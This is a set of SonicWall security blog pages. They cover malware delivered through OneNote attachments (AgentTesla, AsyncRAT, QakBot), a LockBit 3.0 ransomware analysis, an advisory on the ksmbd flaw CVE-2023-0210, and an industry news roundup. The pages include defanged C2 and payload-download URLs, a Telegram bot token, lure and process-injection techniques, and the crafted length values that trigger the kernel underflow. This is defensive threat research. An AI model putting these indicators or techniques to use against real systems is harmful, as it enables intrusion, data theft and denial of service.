There is a never ending run between the threat actors and the security software. The malware authors always look for techniques which can penetrate the active security defenses to get access of victim’s machine and one of the way is, to switch among low profile file types to carry the malicious payload. The malware authors are now using OneNote files which were rarely used for malicious purpose in the past. For the last few weeks, SonicWall RDTMI has been detecting a spike of malicious OneNote files that are being delivered to the victim’s machine as email attachments. SonicWall threat research team observed that the OneNote files are delivering AgentTesla, AysncRAT and QakBot malware. Threat actors are attaching HTML Application (HTA) files, batch files and Portable Executable (PE) files into the OneNote pages and hide the attached files behind an image. The image displays a message to lure the victim to click on them (contains a hidden attachment) which then triggers the malware execution:

Case 1 (Payload: AgentTesla)

Threat actor attaches malicious HTML Application (HTA) file into the OneNote page and duplicates the attachment references, to wider the user click area to access the attachment. The attachments are hidden by overlapping two images, first image is a blurred image which further overlapped by another image which asks user to “View Document”. Once user clicks on the image it will trigger the execution of hidden HTA file:

The HTA file executes two PowerShell instances, one instance to show some image from the web and other instance to download and execute AgentTesla malware on the victim’s machine:

 

The blurred HSBC document from the web is displayed, to mislead the user while performing the malicious activity in the background:

 

The second PowerShell instance starts execution of the downloaded executable in the background which further executes VBScript file and injects the AgentTesla payload into RegSvcs.exe which exfiltrates and sends the user data to its telegram hosted Command and Control (C2) server h[t][t]ps://api.telegram.org/bot5729374237:AAEdSD-W5rWlJyyU5nwVKvjLxJBT1jTdKRY/:

 

 

Case 2 (Payload: AsyncRAT)

Threat actor attaches an obfuscated batch file into the OneNote page. The batch attachment is hidden behind the image which asks user “Click to view document”. The file contains background image of displaying text DHL WORLDWIDE EXPRESS to pretending itself as a delivery document:

 

The Batch file is obfuscated which drops the PowerShell executable into OneNote temp folder with name “invoice.bat.exe” and executes a PowerShell script using the dropped PowerShell executable:

 

 

The PowerShell script reads data from the batch file and decrypts it. The decrypted data is decompressed to get the AsyncRAT executable file which is then executed:

 

The AsyncRAT is widely know malware and its source code is available on the GitHub:

 

In one of the AsyncRAT delivering variant, we have seen the OneNote page is attached with an executable file which further drops a bat file to continue execution, which results in executing AsyncRAT on the victim’s machine:

 

Case 3 (Payload: QakBot)

Threat actor attaches a batch commands file into the OneNote page. The attached file is hidden behind the image which asks user “Open”. The OneNote page also contains image displaying text “This document contains attachments from the cloud, to receive them, double click “open”:

The batch commands file executes PowerShell cmdlet which drops and executes another batch file into C:\Users\Public\aSUNY81.cmd and passes two arguments:

 

The dropped script downloads the QakBot payload from the URL h[t][t]ps://famille2point0.com/oghHO/01.png which is provided as second argument. The QakBot Dynamic Link Library (DLL) is executed by calling the export function Wind:

 

The QakBot injects the malicious payload into iexplorer.exe using process injection. QakBot binary uses tradition method for injecting the payload which involves opening the iexplorer.exe in suspended mode using CreateProcess API, then allocating memory into the iexplorer.exe and writing the payload data into it. After injecting code, mostly malware changes the Instruction Pointer (EIP) to the injected code using SetThreadContext API but QakBot modifies the bytes at EIP which jumps to the injected code:

 

IOCs

SHA256 OneNote files:

8fc8a2b79cb0c0f8113993056e682cd9b56140781cad6bfeabfeac8e6df543e1

1d27ed598f1eab480f067c8920d8f9cd7f7da8b1833d0f58f75d2e2944589210

0a001cf1fd5f6d6994a1635f87493723ba6c6299b67fdf1569c341c87b8aeda1

 

SHA256 PE files:

b75aad495d0bff2f1b5a2b89a8df42a9257f1f01394c859f3ad2bb40d91607d3

a18402d77acd4d9c8b9ae637ffb8ef44b566c777902bb95d81a8cb6c23fec9e7

53a1cbccdb9988dca39ce32963a951b4f8b9d843db57c288195e1cd160bd7f17

 

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution:

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

 

LockBit 3.0 'Black' targets large corps. Operator demands $9M for decryption

/in /by

LockBit 3.0, also known as LockBit Black, is a ransomware family that operates under the Ransomware-as-a-Service (RaaS) model, where the creators collaborate with affiliates who may not have the resources to create and deploy attacks. The LockBit ransomware family is known for its public presence, as it announced its services in July 2022 and even offered a bug bounty program and money to individuals who got the LockBit logo tattooed on their bodies. Despite the public attention, LockBit continues to be one of the most prevalent strains of ransomware and in September 2022, the builder for the ransomware was leaked and made available for download on GitHub.  During our analysis, we were able to engage in a direct conversation with the attacker who reveals a staggering $9M for file decryption.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted.  Each encrypted file is given a “.NegNiNNop” file extension.  File names are also obfuscated. eg. 4sk2dwe.NegNiNNoP.  After encryption, the following message is displayed on the desktop background:

 

The following files are added to the system:

  • C:\ProgramData\NegNiNNoP.bmp [seen above]
  • C:\ProgramData\NegNiNNoP.ico
  • C:\Users\NegNiNNoP.README.txt
  • C:\Users\All Users\NegNiNNoP.bmp
  • C:\Users\All Users\NegNiNNoP.ico
  • C:\Users\{user}\NegNiNNoP.README.txt

 

The following registry key is added:

  • HKEY_CLASSES_ROOT\NegNiNNoP\DefaultIcon @ “C:\ProgramData\NegNiNNoP.ico”

 

NegNiNNoP.ico contains the following image:

 

A file called NegNiNNop.README.txt is written to the desktop and to all folders where files were encrypted.  It contains the following message:

 

A tOr address is provided in the message and brings the victim to the following pages:

 

The operators take pride in their work and display a list of victims on their site.  This list is filled with various organizations from around the world:

 

In addition to requiring payment for data retrieval, the operators double down and threaten to leak sensitive data to the public if the ransom is not paid in time.  This double extortion method adds additional pressure to the victim in an effort to force them to pay the ransom.  Leaked sensitive data is publically available on the site for all to see:

 

 

During our analysis, no data was exfiltrated from the system.

 

On the victim page, a “support” chat box is presented.  This enables direct communication with the attackers.  Ransomware operators usually use this for negotiation with their victims and to provide additional pressure:

 

We had the following live conversation with an operator revealing a $9M decryption fee:

 

The link took us to the following pages.  However, the files referenced were not from our network:

 

This appears to be a bug on their end:

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LockBit3.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Linux Kernel ksmbd Integer Underflow Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  KSMBD stands for Kernel-based SMB Direct. It’s a Linux kernel module that provides the implementation of the SMBv3 protocol, allowing the Linux kernel to act as a server for SMB (Server Message Block) clients. SMB is a protocol used for sharing files, printers, and other resources between computers in a network.

  SMBv3 is the latest version of the protocol and provides several new features and improvements over previous versions, including better security features such as encryption, improved performance, and better support for large files and high-availability scenarios.

  KSMBD enables the Linux kernel to directly handle SMB requests, eliminating the need for a user-space daemon to translate the requests into kernel calls. This results in improved performance and lower overhead compared to traditional SMB implementations that rely on user-space daemons.

  A denial of service vulnerability has been reported for Linux kernel. This vulnerability is due to an integer underflow in the ksmbd_decode_ntlmssp_auth_blob function.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0210.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.7 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  NTLMSSP is a proprietary authentication protocol used in Microsoft Windows. It involves the exchange of a series of messages between the client and the server to establish the authenticity of the client. The messages are encoded using the ASN.1 (Abstract Syntax Notation One) standard and serialized using the DER (Distinguished Encoding Rules) format. Understanding the details of NTLMSSP authentication, as well as the encoding and serialization formats used, is important for understanding this vulnerability.

  There is an integer underflow exists in the ksmbd kernel module when handling SMB2 SESSION_SETUP messages. Specifically, the flaw exists due to failure of message validation when processing the NTLMSSP authentication messages. A vulnerable function ksmbd_decode_ntlmssp_auth_blob() is responsible for handling the NTLMSSP_AUTH message. It extracts the value from Length for NTLM Response field and store it into a local variable nt_len. Then, it uses the calculation result of nt_len – CIFS_ENCPWD_SIZE(16) as the argument blen of the function ksmbd_auth_ntlmv2(). The function ksmbd_auth_ntlmv2() allocates a kernel buffer using size of blen+CIFS_CRYPTO_KEY_SIZE(8) and operates two memory copies using the size of CIFS_CRYPTO_KEY_SIZE and blen respectively.

  However, the vulnerable function failed to validate if nt_len is smaller than CIFS_ENCPWD_SIZE(16) or not. A positive value under 16 will result in an integer underflow condition. To make the memory allocation success, the value need to be in the range of 8-15. For example, if the nt_len is 12, then blen would be -4 and the memory allocation size is 4, and the later memory copy with sizes of 8 and 0xFFFFFFFC (-4) both result in the memory overflowed.

Triggering the Problem:

  • The vulnerable system must be listening on the vulnerable SMB port, and accept incoming connections.
  • The attacker must have connectivity to the target system.
  • The attacker must know a valid SMB user name on the target system.

Triggering Conditions:

  The attacker connects to the target ksmbd server. The vulnerability is triggered when the attacker sends a crafted SMB2 SESSION_SETUP request with crafted Security Blob field.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMB/CIFS

  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 3510 Linux Kernel ksmbd DoS 1

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Configure the vulnerable product to allow access to trusted clients only.
    • Update to a non-vulnerable version of the product.
    • Filter attack traffic using the signature above.
  The vendor has released the following commit regarding this vulnerability:
  Vendor Advisory

Cybersecurity News & Trends – 02-10-2023

/0 Comments/in /by

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

Winter is rolling on, and SonicWall is still plowing its way into headlines. ITPro cited our data while discussing major ransomware strains. Our Director of Regional Sales in LATAM, Arley Brogiato, spoke with GQ Brasil. We congratulate SonicWall’s Jason Carter and Matt Brennan for earning 2023 CRN Channel Chief Recognition.

In industry news, Bleeping Computer reported on a grocery delivery service breach that affected over 1 million customers and a Canadian bookstore that suffered a major attack. Dark Reading told the tale of an ethical hacker gaining control of Toyota’s internal systems. Ransomware is running loose on an unpatched VMWare product according to Hacker News. IT Security Guru reported on an attack from the notorious LockBit ransomware gang that halted London stock trading.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the dissemination of the news, which on the morning of last Monday (6) competed with football game calendars and the price of cooking gas in Manaus the most sought after Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector

TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

The Best Hardware Firewalls for Small Businesses

Ask by Geeks, SonicWall News: One of the best small business firewalls is the SonicWall TZ400 Security Firewall. The SonicWall TZ400 NGFW Premium is considered a little more expensive than other firewall options, but its security, reliability, ease of use, and unique features justify its price.

10 million Customers Exposed in JD Sports Cyber Attack

ITPro, SonicWall News: A study last year by SonicWall found that the retail sector saw a 264% surge in ransomware attacks between February 2021 and 2022. The widespread consumer shift to online shopping during the pandemic prompted hackers to escalate attacks against online retailers.

Three Ways Governments Can Better Protect Public Data

Networking+, SonicWall News: The chances of being hit by a ransomware attack are more significant than ever. Last year, global ransomware volume skyrocketed by 105% year over year, according to the 2022 SonicWall Cyber Threat Report. While no industry was spared, the numbers were particularly gruesome for governments. Ransomware attempts on government entities rose a staggering 1,885%. That’s more than double the increase reported by healthcare (755%), education (152%), and retail (21%) combined.

2023 Predictions: Emerging Tech & Global Conflict Bring New Cyber Threats

CyberSecurityInsiders, SonicWall News: 2022 saw a shifting cybersecurity landscape as rising geopolitical conflicts brought new tactics, targets, and goals for cybercrime. According to recent threat intelligence from SonicWall, global ransomware attempts declined 31% YoY as cybercriminals and nation-state actors opted for never-before-seen malware variants, IoT malware, and cryptojacking in attacks motivated by financial gain and state-sponsored hacktivism.

Cybersecurity ‘More Critical Than Ever’ In Era of Connected Care: BD

MedTechDive, SonicWall News: Ransomware attacks in which cybercriminals attempt to extort money declined by 23% overall during the first half of 2022 but increased 328% in healthcare, according to data from cybersecurity company SonicWall.

IT Services Industry Looks to Cyber, Cloud Consulting for Growth

TechTarget, SonicWall News: Logically’s MSSP offerings include extended detection and response, endpoint detection and response, and MDR; enterprise-level managed firewall services; and cybersecurity assessments, according to Skeens. The company runs a SOC. The company’s IT security technology partners include SonicWall.

The Sonicwall NSsp 15700 Brings Serious Network Protection Super Powers

iTWire, SonicWall News: iTWire really could go on and on; the list of features is almost endless. There is a database of applications for intelligent packet analysis, support for IoT devices, DNS protection, and more. However, the best thing right now is to take it for a spin yourself. You can demo the SonicWall NSsp series firewalls online without any installation or commitment and see all the features and benefits in action.

Royal Mail ‘Cyber Incident’ Causes Widespread Disruption

Strategic Risk, SonicWall News: There were 623 million ransomware attacks globally in 2021 according to Sonic wall, representing a 105% year on year increase. The UK saw a 228% surge and a 65% increase in never-seen-before malware.

Industry News

Weee! Grocery Service Discloses Data Breach Affecting Over 1 million Customers

The self-proclaimed largest Asian and Hispanic grocery delivery service in North America, Weee!, lost the personal data of 1.1 million customers in a recent breach. According to Bleeping Computer, a bad actor with the username ‘IntelBroker,’ began leaking data from Weee! on a data breach forum. The leak contained customers names, phone numbers, email addresses, device types, order notes and other data. Weee! does not retain customer payment information in their databases, so no customer payment data was lost. Weee! stated that they would notify all impacted customer individually if their information was exposed.

Cyberattack Disrupts London Stock Trading

A ransomware attack brought London stock trading to a screeching halt last week. The ransomware group LockBit targeted Ion Markets in an attack. Ion Markets is a financial data group that supports a large amount of derivatives trading in the London market. According to IT Security Guru, 42 clients were affected by the attack. The attack even forced some groups to begin processing trades manually. LockBit allegedly used its signature ransomware attack which locks the victims out of accessing their data through encryption and leaves a note demanding payment. The company said all affected servers have been disconnected and they’re working to resolve the issue.

Hacker Gains SysAdmin Privileges to Toyota Through Portal Flaw

A web app for Toyota employees was broken into by an ethical hacker who simply knew the email address of one of the users. The security researcher revealed that he discovered the backdoor entrance into the app in October. In a blog post about the attack, he revealed that he was able to log in as any corporate user or supplier. He used that entryway to log in as a system administrator and therefore gain total control over the app. According to Dark Reading, he then had full access to internal projects, documents and user accounts. This is yet another sign that every business should be taking extra care with their cybersecurity. Toyota is lucky that this hacker was ethical.

Canadian Bookseller Goes Dark Following Cyberattack

The largest book retailer in Canada, Indigo Books & Music, shut down following a cyberattack. The retailer was forced to take its website offline and resort to cash only payments at its physical locations. The attack even made gift card purchases impossible. According to Bleeping Computer, it’s still unclear what type of attack the bookseller suffered. The retailer released a statement indicating they are working with a third party to determine the cause and resolve the situation.

VMWare Bug Exploitation Attracts Ransomware Attacks

According to Hacker News, attacks focused on VMWare ESXi hypervisors are deploying ransomware on vulnerable systems. The attacks are targeting outdated software. A patch has been available since February 2021. The experts believe it can be traced to a Rust-based ransomware strain called ‘Nevada.’ VMWare recommends users update to the latest patch to avoid any issues.

SonicWall Blog

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

‘3 & Free’ Promotion: How to Upgrade to a New SonicWall TZ Series NGFW for Free – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

Talking Boundless Cybersecurity at the Schoolscape IT 2022 Conference – Mohamed Abdallah

3 & Free: 1 Amazing Deal, 2 Exceptional Firewalls, 3 Years of Superior Threat Protection – Matt Brennan

SonicWall Wins CRN’s 2022 Tech Innovator Award in Enterprise Network Security – Bret Fitzgerald

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

10 Reasons to Upgrade to the Latest SonicWall Gen 7 TZ Firewall – Sarah Choi